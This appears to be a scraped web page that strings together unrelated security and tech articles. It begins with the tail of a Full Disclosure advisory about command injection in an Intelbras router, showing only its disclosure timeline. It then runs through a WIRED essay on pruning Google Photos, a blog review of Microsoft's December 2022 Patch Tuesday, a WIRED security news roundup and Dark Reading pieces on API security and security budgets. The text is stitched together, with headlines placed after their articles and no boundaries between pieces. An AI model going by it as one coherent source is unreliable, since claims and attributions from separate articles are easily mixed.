> https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip
> 
> Workaround
> 
> \-------------------------------------------------------------------------------
> 
> None
> 
> 
> Recommendation
> 
> \-------------------------------------------------------------------------------
> 
> CyberDanube recommends Intelbras customers to upgrade the firmware to the
> latest version available.
> 
> 
> Contact Timeline
> 
> \-------------------------------------------------------------------------------
> 
> 2022-08-02: Contacting Intelbras via suporte () intelbras com br.
> 2022-08-03: Request from Intelbras to send the advisory to
> csirt () intelbras com br; Sent the advisory to this address.
> 
> 2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date
> 
>             to 2022-10-03 (60 days policy).
> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
> 2022-10-09: Coordinated disclosure of advisory.
> 
> 
> Web: https://www.cyberdanube.com
> Twitter: https://twitter.com/cyberdanube
> Mail: research at cyberdanube dot com
> 
> EOF T. Weber / @2022

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh** _Thomas Weber (Dec 13)_

CVE-2022-40005: Full Disclosure: Re: CyberDanube Security Research 20221009-0

Ever-expanding cloud storage presents more risks than you might think.

Every year, more than a billion people use the Google Photos app to upload and store billions of pictures and videos. For many, the process is likely identical: You snap some photos with your phone and they’re automatically uploaded to Google’s cloud service. You might pick the best photo and share it on WhatsApp or Instagram and then never think about the rest of them ever again. The photos join a constantly updating stream of data about life.

But it shouldn’t be this way. Uploading thousands of photos and never taking any steps to sort or manage them creates a series of privacy risks and is making it impossible to maintain your photo collection in the future. Now is the time to stop being an information hoarder, before it spirals out of control.

For the past six weeks, I’ve spent around a dozen hours deleting thousands of photos that had been uploaded to my Google Photos account in the last half-decade. In total, I erased 16,774 photos and videos. During the process—and thousands of "delete" taps—three things stood out: My photos collection unknowingly includes a lot of sensitive personal information (both about me and others); I don't need to keep so many photos; and wrestling my collection into shape frees up a lot of space in my Google account.

My photo archive goes back to the early 2000s when everything was captured using an eight-megapixel digital camera. There are tens of thousands of photos—it’s impossible to say how many exactly—and they are entirely handled by Google. The photos were initially stored on CDs, moved to Flickr before it limited collections to 1,000 images, and finally found their way onto Google Photos around 2018. When Google limited accounts to 15 gigabytes of storage, I started paying for more.

Inside the collection, family holiday shots sit alongside selfies. Food pictures and dog pictures are plentiful. As phone cameras have improved and cloud storage has become seemingly unending, it appears that I take more photos every year. I am not the only one. Google Photos holds an unfathomable amount of data about us all: In 2020, the company said it stores 4 trillion photos, with 28 billion new photos and videos uploaded each week.

Deleting thousands of photos was a manual, tedious process. Using an iPad, I scrolled through every photo I had backed up from the past 15-plus years and tapped each one that I wanted to send to trash. In one of the longer sessions, I erased 2,211 photos in 45 minutes. The majority of photos binned were duplicates: Instead of having 16 pictures of me running through a forest, only the best two or three remain. Thousands of screenshots were culled: The moment I was verified on Twitter and the news article about a goat being arrested didn’t make it through the process unscathed.

But beneath the surface, there were plenty of images that should never have been kept in the first place. For years, I had been keeping photos of passports—my own and those of friends who had sent me the details for booking trips. I found photos of the details needed to log in to my bank account. I was storing people’s addresses and screenshots of directions to their homes. The list goes on: private email addresses, NSFW photos, screenshots of embarrassing conversations, common running routes and travel directions, pictures of notebooks from sensitive meetings. Huge swaths of my life were stored in my photos. I didn’t know they were there or had forgotten about them as soon as they weren’t useful. 

Each of these presents a risk. While Google makes the vast majority of its profits from advertising—its privacy policy says it won’t show you personalized ads based on your photos—the company has a strong data security record. Successful hacks against the company are incredibly rare. However, each piece of data that you’re unnecessarily storing adds a little extra hazard if something does go wrong. Documents could be used to assist with identity theft, while other personal details could contribute to building up a picture of who you talk to, where you live, and the places you frequent. Aside from any potential data breaches, my photos could potentially be accessed if my phone is lost or stolen. (These issues aren’t unique to Google Photos; they equally apply to any online photo storage service.)

But there are other reasons to spend some time clearing up your photos. Ever-expanding cloud storage makes it possible to keep taking photos and adding to the pile. Once sorted, it has been easier to find specific events and the best photos from them. If I had waited another few years, the task would have been too daunting to even start. In another 10 years, I may have taken an extra 20,000 to 40,000 photos. Now I plan on sorting the most recent photos once a year. 

Plus, practically speaking, there’s now more space in my Google account. Before I started deleting everything, I’d used up around 80 GB of storage; I’ve decreased this to about 60 GB. Google has some tools to help you manage your photos. You can archive photos if you don’t want to delete them or keep them in your main photo library. And pictures can be siphoned off into albums (it was too late for me). Its storage management tools allow you to delete large photos and videos in bulk and get rid of screenshots and blurry photos. It’s also possible to free up some of your account’s space by shrinking the size of photos by dropping them to “storage saver quality.”

However, my obsession with organizing my digital life—including operating a strict WhatsApp Zero policy—means that I would be fully satisfied with the job only if I did it manually. As I sifted through the tens of thousands of photos I’ve taken during two-thirds of my life, there was a satisfying glow to the process—a nostalgia vortex. Once I was done, I started taking more photos.

Everyone Is Using Google Photos Wrong

Hello everyone! This episode will be about Microsoft Patch Tuesday for December 2022, including vulnerabilities that were added between November and December Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities. Alternative video link (for Russia): https://vk.com/video-149273431_456239112 But let’s start with an older vulnerability. This will be another example why […]

Hello everyone! This episode will be about Microsoft Patch Tuesday for December 2022, including vulnerabilities that were added between November and December Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities.

Alternative video link (for Russia): https://vk.com/video-149273431\_456239112

But let’s start with an older vulnerability. This will be another example why vulnerability prioritization is a tricky thing and you should patch everything. In the September Microsoft Patch Tuesday there was a vulnerability **Information Disclosure** – SPNEGO Extended Negotiation (NEGOEX) Security Mechanism (CVE-2022-37958), which was completely unnoticed by everyone. Not a single VM vendor paid attention to it in their reviews. I didn’t pay attention either.

**SPNEGO** **(Simple and Protected GSSAPI Negotiation Mechanism)** is a GSSAPI “pseudo mechanism” used by client-server software to negotiate the choice of security technology. SPNEGO is used when a client application wants to authenticate to a remote server, but neither end is sure what authentication protocols the other supports. Who knows what kind of disclosure there might be. This vulnerability had CVSS 7.5 (High), not even Critical.

And then on December 13th, IBM Security X-Force researcher Valentina Palmiotti posts a video exploiting this vulnerability, which turns out to be Remote Code Execution. In this video, a Python script is executed in a Linux virtual machine, and in a Windows 10 virtual machine, the message _“Your PC will automatically restart in one minute”_ appears, which indicates that some code was executed there. The researcher is famous and it is highly unlikely that the video is fake.

It turned out that the vulnerability can be exploited during the authentication attempts. The vulnerability affects various protocols. Primarily RDP and SMB. It may be relevant for SMTP, HTTP and others with a non-standard configuration. So, this vulnerability could potentially be worse than EternalBlue.

Microsoft has made changes to the description of the vulnerability. Now it is Critical RCE. NVD hasn’t made any changes yet. IBM promises not to release details until the second quarter of 2023 to give people time to patch.

Now let’s look at the most interesting vulnerabilities of Microsoft Patch Tuesday for December 2022.

    $ cat comments_links.txt 
    Qualys|December 2022 Patch Tuesday|https://blog.qualys.com/vulnerabilities-threat-research/patch-tuesday/2022/12/13/the-december-2022-patch-tuesday-security-update-review
    ZDI|THE DECEMBER 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/12/13/the-december-2022-security-update-review
    
    $ python3.8 process_classify_ms_products.py  # Automated classifier for Microsoft products
    
    $ python3.8 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2022 --mspt-month "December" --mspt-comments-links-path "comments_links.txt"  --rewrite-flag "True"
    ...
    Creating Patch Tuesday profile...
    MS PT Year: 2022
    MS PT Month: December
    MS PT Date: 2022-12-13
    MS PT CVEs found: 49
    Ext MS PT Date from: 2022-11-09
    Ext MS PT Date to: 2022-12-12
    Ext MS PT CVEs found: 32
    ALL MS PT CVEs: 81
    ...

*   All vulnerabilities: 80
*   Urgent: 0
*   Critical: 3
*   High: 29
*   Medium: 48
*   Low: 0

There were 2 vulnerabilities with signs of exploitation in the wild:

1.  **Security Feature Bypass** – Windows SmartScreen (CVE-2022-44698). It is a bypass of the Windows SmartScreen security feature, and has been seen exploited in the wild. It allows attackers to craft documents that won’t get tagged with Microsoft’s “Mark of the Web” despite being downloaded from untrusted sites. Exploitation in the wild is mentioned on Vulners (cisa\_kev object), AttackerKB, Microsoft websites. The existence of a public exploit is mentioned in Microsoft CVSS Temporal Score (Functional Exploit). To be honest, I do not consider these warnings from the operating system to be effective. Therefore, this vulnerability does not seem very critical to me. I think an Antivirus or EDR solution should block suspicious files from running in the first place.
2.  **Memory Corruption** – Microsoft Edge (CVE-2022-4135, CVE-2022-4262). Exploitation in the wild is mentioned on Vulners (cisa\_kev object), AttackerKB websites. CVE-2022-4135: Heap buffer overflow in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High). CVE-2022-4262: Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Among other vulnerabilities without public exploits and signs of exploitation in the wild, it makes sense to pay attention to the following:

1.  **Remote Code Execution** – Microsoft PowerShell (CVE-2022-41076). This critical vulnerability affects PowerShell where any authenticate user, regardless of its privilege could escape the PowerShell Remoting Session Configuration and run unapproved commands on the target system. It is worth mentioning that, typically after the initial breach, attackers use the tools available on the system to keep the preserve or advance around a network, and PowerShell is one of the more capable tools they can find. 
2.  **Remote Code Execution** – Windows Secure Socket Tunneling Protocol (SSTP) (CVE-2022-44670, CVE-2022-44676). This critical vulnerability affects Windows Secure Socket Tunneling Protocol (SSTP), and according to Microsoft, an attacker would need to win a race condition to successfully exploit these bugs. An unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine. If you do not have this service, disable it. 
3.  Among the **Elevation of Privilege** vulnerabilities, I would like to highlight a vulnerability in DirectX Graphics Kernel (CVE-2022-44710) and Windows Print Spooler (CVE-2022-44678, CVE-2022-44681).

Full Vulristics report: ms\_patch\_tuesday\_december2022

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

Microsoft Patch Tuesday December 2022: SPNEGO RCE, Mark of the Web Bypass, Edge Memory Corruptions

Plus: An offensive US hacking operation, swatters hacking Ring cameras, a Netflix password-sharing crackdown, and more.

We at WIRED are winding down for the year and gearing up for what is sure to be an eventful 2023. But 2022 isn’t going down without a fight. 

This week, following a new surge in mayhem at Twitter, we dove into exactly why the public needs real-time flight tracking, even if Elon Musk claims it’s the equivalent of doxing. The crucial transparency this publicly available data provides far outweighs the limited privacy value that censoring would give to the world’s rich and powerful. Unfortunately, Musk’s threats of legal action against the developer of the @ElonJet tracker are having broader chilling effects. 

Meanwhile, Iran’s internet blackouts—a response to widespread civil rights protests—are sabotaging the country’s economy, according to a new assessment from the US Department of State. Due to heavy sanctions on Iranian entities, the exact economic impact of Tehran’s internet blackouts is difficult to calculate. But experts agree it’s not good. 

You may have encountered the Flipper Zero in a recent viral TikTok video—but don’t believe everything you see. WIRED’s Dhruv Mehrotra got his hands on the palm-size device, which packs an array of antennas that allow you to copy and broadcast signals from all types of devices, like RFID chips, NFC cards, and more. We found that while the Flipper Zero can’t, say, make an ATM spill out money, it allows you to do plenty of other things that could get you into trouble. But mostly, it allows you to see the radio-wave-filled world around you like never before.

But that’s not all. Each week, we round up the security stories we didn’t cover in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there. 

Between long hours, medallion costs, and the rise of Uber and Lyft, the life of a New York City cab driver is hard enough. Now it seems that Russian hackers—and a couple of their enterprising partners in Queens—were trying to get their own cut of those drivers’ fares.

According to prosecutors, two Queens men, Daniel Abayev and Peter Leyman, worked with Russian hackers to gain access to the taxi dispatch system for New York’s JFK airport. They then allegedly created a group chat where drivers could secretly pay $10 to skip the sometimes hours-long line to be assigned a pickup—about a fifth of the $52 flat fee passengers pay for rides from the airport to elsewhere in NYC. The indictment against the two men doesn’t name the Russians or detail exactly how they gained access to JFK’s dispatch system. But it notes that since 2019, Abayev and Leyman allegedly schemed to get access to the system by multiple methods, including bribing someone to insert a USB drive with malware into one of the dispatch operators’ computers, gaining unauthorized access to their systems via Wi-Fi, and stealing one of their tablet computers. “I know that the Pentagon is being hacked,” Abayev wrote to his Russian contacts in November 2019, according to the indictment. “So, can’t we hack the taxi industry\[?\]” 

Before the scheme was shut down, prosecutors say it was enabling as many as a thousand fraudulent line-skips a day for drivers, 

It’s hardly a secret that Cyber Command, the more cyberattack-focused sister organization to the NSA, is frequently engaged in “hunting forward,” as Cybercom director Paul Nakasone has described it. That means hacking foreign hackers preemptively to disrupt their operations, often in advance of an event like a US election. So perhaps it’s no surprise, as _The Washington Post_ reports, that Cybercom targeted Russian and Iranian hackers throughout the 2022 midterm elections. It’s not clear exactly how those hackers were disrupted, but one official told the _Post_ that the operations typically go after the basic tools the hackers use to operate, including their computers, internet connections, and malware. In some cases, that foreign malware is discovered by Cybercom abroad and shared with potential targets in the US to make it more easily detected. 

While foreign hacking of US elections has waned since its peak in 2016—when Russia hacked the Democratic National Committee, Clinton campaign, and many other targets—it has by no means disappeared. Cybersecurity firm Mandiant reported this week that the Russian military intelligence agency the GRU appears to have targeted election websites with distributed denial-of-service attacks during the midterm elections, despite Cyber Command’s efforts.

On Monday, federal prosecutors charged two men—one from Wisconsin, the other from North Carolina—for allegedly participating in a swatting scheme that, over a one-week span, targeted the owners of more than a dozen compromised Ring home security door cameras.  According to the indictment, Kya Christian Nelson, 21, and James Thomas Andrew McCarty, 20, used login credentials from leaked Yahoo accounts to access Ring accounts from individuals around the country. The defendants then allegedly phoned in false reports to law enforcement claiming to dispatchers that a violent incident was taking place at the victim’s house, and then they livestreamed the police response to the hoax. In several of the incidents, the two men taunted responding police officers and victims through the microphone of the Ring device, according to the indictment.

Nelson, who went by the alias “ChumLul,” is currently incarcerated in Kentucky in an unrelated case. McCarty, who went by the alias “Aspertaine,” was arrested last week on federal charges filed in the District of Arizona. Nelson and McCarty are both charged with conspiring to intentionally access computers without authorization. Nelson has also been charged with two counts of intentionally accessing a computer without authorization and two counts of aggravated identity theft. If convicted, they could each face up to five years in prison, with Nelson facing an additional seven years for the additional charges.

In March 2017, Netflix tweeted a simple message: “Love is sharing a password.” Now, five years later, that sentiment is coming to the end of its life. According to a _Wall Street Journal_ report this week, the streaming service plans to clamp down on password sharing in early 2023. Netflix has been testing ways to stop households in Latin America from sharing passwords throughout 2022, and the report suggests it is ready to expand the measures. Netflix says more than 100 million viewers watch its TV shows and movies using other people’s passwords, and it wants to convert those views into cash. “Make no mistake, I don’t think consumers are going to love it right out of the gate,” the _Journal_ reports Netflix co-CEO Ted Sarandos telling investors earlier this year. Elsewhere, the UK government’s Intellectual Property Office said it believes sharing passwords for online streaming services could breach copyright laws. It is unlikely anyone would ever be prosecuted, though.

The Roomba J7 home robot uses “PrecisionVision Navigation” to avoid objects in your home—such as piles of clothes on the floor or accidental piles of dog crap. The robot is partly able to do this using a built-in camera and computer vision. However, as _MIT Technology Review_ reported this week, gig economy workers in Venezuela posted photos from the robots online—including one image of a woman on the toilet. The photos and videos were captured by a development version of the J7 robot in 2020 and shared with a startup that contracts workers to label the images, helping to train computer vision systems. Those using the development machines had agreed for their data to be shared. Roomba maker iRobot, which is being purchased by Amazon, said it is ending its contract with the startup that leaked the images and is investigating what happened. However, the incident highlights some of the potential privacy risks with the vast data sets that are used to train artificial intelligence applications.

All Kelly Conlon wanted to do was watch the Rockettes with her daughter’s Girl Scout troop. But thanks to a face recognition system run by Madison Square Garden Entertainment, Conlon was summarily kicked out of Radio City Music Hall because she was unknowingly banned from the venue. The issue, according to MSG Entertainment, is that Conlon is an attorney at a law firm that’s currently engaged in litigation against the company. (Conlon said she is not personally involved in that litigation.) “They knew my name before I told them. They knew the firm I was associated with before I told them. And they told me I was not allowed to be there,” Conlon told NBC New York. MSG Entertainment, meanwhile, defended the attorney's expulsion as necessary to avoid an “inherently adverse environment.” The episode adds to concerns over the use of face-recognition tech, which remains so underregulated that a corporation can use it to punish its enemies. Happy holidays!

Russians Hacked JFK Airport Taxi Dispatch in Line-Skipping Scheme

APIs are key to cloud transformation, but two Google surveys find that cyberattacks targeting them are reaching a tipping point, even as general cloud security issues abound.

Web application programming interfaces (APIs) are the glue that holds together cloud applications and infrastructure, but these endpoints are increasingly under attack, with half of companies acknowledging an API-related security incident in the past 12 months.

According to a survey conducted by Google Cloud, the most troublesome security problems affecting companies' use of APIs are security misconfigurations, outdated APIs and components, and spam or abuse bots — with 40% of companies suffering an incident due to misconfiguration and a third coping with the latter two issues. 

Two-thirds of companies (67%) found API-related security issues and vulnerabilities during the testing phase, but most companies — greater than 60% — discovered issues during the software development process, during application deployment, and by using real-time monitoring, according to the survey of more than 500 technology leaders.

Despite these issues, more than three-quarters (77%) have confidence that they will catch issues, saying they have the required API tools and solutions, says Vikas Anand, head of product for business application platforms at Google Cloud.

"There's a perception of confidence with existing tooling that isn’t matched by evidence," Anand says. "The landscape for security has changed — with the dramatic growth in API volume, APIs are the new battleground for application security."

The interest in Web APIs comes as companies have accelerated their digital transformations over the past two years following the business disruptions caused by the coronavirus pandemic. Nearly all (93%) of companies surveyed by Google in a second study of 770 technology leaders characterized their operations as based on "mostly cloud," up from 83% two years ago. 

In contrast, business decision-makers characterizing their operations as "mostly on-premises" dropped by half to 7%, from 16%, in the same time period.

    

Source: Google Cloud

By one estimate, API-related security incidents caused $12 billion to $23 billion in losses since 2020. And the attack surface is getting bigger: The average large company has three times the number of APIs — 15,600 — as a year ago.

**APIs: Key to Cloud Transformation**

While 46% of organizations surveyed reserved their use of APIs to only within their own organization, more than half (54%) allow partners, customers, and other external developer use the APIs as a way to spur third-party development, Google found.

"APIs are critical to application modernization and digital transformation because, along with microservices, they enable rapid delivery of new experiences to customers, while cutting the cost of development and maintenance," Google Cloud stated in its _"_The Digital Crunch Time: 2022 State of APIs and Applications" report.

Because APIs are critical to their digital transformation, companies have wisely prioritized API security investments, with 60% aiming to improve their ability to proactively identify security threats, and 57% adopting more security automation and orchestration, according to Google Cloud's second report, "API Security: Latest Insights & Key Trends." 

About half of companies also intend to expand their real-time monitoring of API servers and using artificial intelligence and machine learning (AI/ML) systems to better discover flaws and detect attacks.

"As organizations move from being reactionary to proactively addressing these threats, we’ll see AI/ML models become more widely adopted within security tooling," Anand says. "ML-based rules are the natural evolution of this — not just automating, but continuously learning from those experiences."

**API Maturity Brings Cloud Success**

Unsurprisingly, companies that have had more experience with APIs have also found more success with their transition to more cloud-native operations.

About a third of companies (34%) classified themselves as having a mature approach to APIs, pushing an API-first strategy across the organizations and using an API management platform. Those companies also had more success increasing efficiency, better collaboration, and improved agility, compared with organizations with lower API maturity. 

Google Cloud defined low-maturity organizations as those with siloed APIs, no centralized management of APIs, and perhaps an API gateway for security.

"Our study shows that mature API organizations are considerably ahead in their digital transformation efforts compared to low-maturity API organizations," according to the vendor. "Technology leaders already understand the value that APIs bring."

For companies moving to API-based application infrastructure, API security is considered the most significant component of an API program, with 66% of companies considering it important, according to Google's report. Other top concerns included API performance analytics and API governance.

"API security ultimately needs to be part of the overall end-to-end security strategy," Anand says. "Seamless integrations between all security products make enhancing the overall security value from your portfolio easier."

Google: With Cloud Comes APIs & Security Headaches

With a recession potentially coming, some companies are cutting security teams. But moving more infrastructure to the cloud and reducing the number of vendors through consolidation may be the best ways to prepare.

As economic forecasters and businesses raise expectations of a recession in 2023, information-security budgets will likely be pressured in the coming year, experts tell Dark Reading.

Because of latent demand, the call for cybersecurity workers is in flux. While some companies — Patreon, for example — have laid off their cybersecurity teams, other businesses are pausing hiring, as many have open requisitions for cybersecurity specialists. It would be difficult to fill positions anyway: There are currently only enough cybersecurity workers to fill 65% of positions, according to CyberSeek US.

Instead, security teams will have to make do with what they have going forward. The best way to do that is consolidating vendors to reduce costs, and find ways to bring in managed security service providers (MSSPs) to help with areas in which they lack expertise, says Mike Hamilton, chief information security officer at threat-detection and management firm Critical Insight.

"Enterprises have the ability to hire and maintain large teams, so they will continue to do that, but in the mid-market, IT has just got to suck it up and do more security as part of their job," he says. "That's pretty much they way it is everywhere."

While economists and business leaders do not have a great track record for forecasting recessions, current surveys of sentiment have set historical records for recessionary predictions. The Wall Street Journal's quarterly survey of economists found that 63% expect a recession in the next 12 months, the highest registered negative sentiment from economists in the nation outside of an ongoing recession.

Half of companies are already considering instituting IT technology austerity measures, a share that will likely increase if a recession takes hold. Yet, information security should not relax their defensive vigilance, says Merritt Maxim, vice president and research director at Forrester Research.

"Companies need to be as diligent as before," he says. "Hackers and others are not going to stop doing what they have been doing, because of a recession. That will actually spur more activity."

**Turning to the Cloud to Cut IT Security Costs**

Companies should consider moving more infrastructure to the cloud as an austerity measure, experts say. While US firms have moved less than half (45%) of current infrastructure to cloud services, they expect to have 58% of their applications in the cloud in two years, according to Forrester.

While cloud costs have risen and cloud-native application require a different set of skills to secure, they still cost less than equivalent on-premise technologies, Forrester stated in its "Planning Guide 2023: Security & Risk" report. Based on the costs for maintenance, licensing, upgrades, and other investments, on-premises technology consumes the largest percentage of security costs — 41% for companies spending 20% or less of their IT budget on security.

Other experts also recommended cloud infrastructure as being easier and less costly to secure.

"Budget pressure also poses an opportunity and added incentive to accelerate this transformation rather than continue to execute on previous templates," enterprise software firm SAP stated in its security recommendations for 2023. "The cloud poses new security challenges, but also capabilities to optimize and make use of economies of scale."

**Security Vendor Consolidation Reigns: But It May Not Be a Choice**

Managing the disparate security, compliance, and threat-intelligence systems necessary to have visibility and control in a corporate environment has ballooned in the past decade. The average large company has 75 security solutions, according to Microsoft. Over all businesses, the number is smaller but still large, with 13% of companies having more than 20 vendors, according to Cisco's 2020 CISO Benchmark Study.

No wonder, then, that consolidation has become a major strategy going into 2023, with three-quarters of businesses planning to reduce the number of security vendors on which they rely. And many vendors are leaning into that consolidation strategy, not surprisingly. Microsoft, for example, touts cost savings as one of the benefits of consolidating to a single vendor's products and services, claiming that unifying security, compliance, and identity solutions can save up to 60% in costs.

"Managing multiple vendors can be burdensome for IT, while valuable security insights sit siloed in separate dashboards," Vasu Jakkal, corporate vice president for security, compliance, identity, and management at Microsoft, stated in a blog post. "And siloed solutions can result in fragmented visibility and can be exploited."

As part of the strategy, many vendors are buying up smaller firms and rivals — a mixed blessing for companies given that they may have fewer choices in the future. Companies may get more capabilities for less, but they may also find themselves paying for unwanted features, says Forrester's Maxim.

"Whether companies are planning to consolidate or not, I think a lot of consolidation is going to happen on its own, either through strategic M&A or fire-sale M&A, because of where we at in this economy," he says. "Private equity still has a huge amount of capital, and the operations benefits from reducing the number of vendors is significant."

Finally, organizations will find that there are some costly security and risk areas that they simply cannot jettison, such as compliance and governance costs, Critical Insight's Hamilton says. Publicly traded companies, in particular, have little leeway in cutting the costs associated with some regulations.

"You cannot neglect things like governance," he tells Dark Reading, "and you have to make sure your compliance is being met every year."

Tag

#sap